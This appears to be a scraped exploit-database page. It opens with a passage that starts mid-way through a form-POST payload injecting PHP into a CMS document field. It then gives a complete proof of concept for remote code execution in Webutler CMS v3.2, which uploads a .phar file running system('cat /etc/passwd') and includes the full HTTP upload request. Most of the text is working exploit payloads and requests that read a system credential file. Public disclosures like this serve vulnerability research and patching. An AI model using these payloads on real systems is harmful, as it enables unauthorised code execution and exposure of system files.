/>we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1<br /><br /></code></pre>
<pre><code>Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)<br />Application: webutler Cms<br />Version: v3.2<br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://webutler.de/en<br />Software Link: http://webutler.de/download/webutler_v3.2.zip<br />Date of found: 03.08.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. login to account as admin<br />2. go to visit media <br />3.upload phar file<br />4. upload poc.phar file<br /><br />poc.phar file contents :<br /><?php echo system("cat /etc/passwd");?><br />5. Visit to poc.phar file<br />poc request:<br /><br />POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1<br />Host: localhost<br />Content-Length: 40<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />X_FILENAME: poc.phar<br />sec-ch-ua-platform: ""<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/webutler_v3.2/admin/browser/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu<br />Connection: close<br /><br /><?php echo system("cat /etc/passwd");?><br /><br /></code></pre>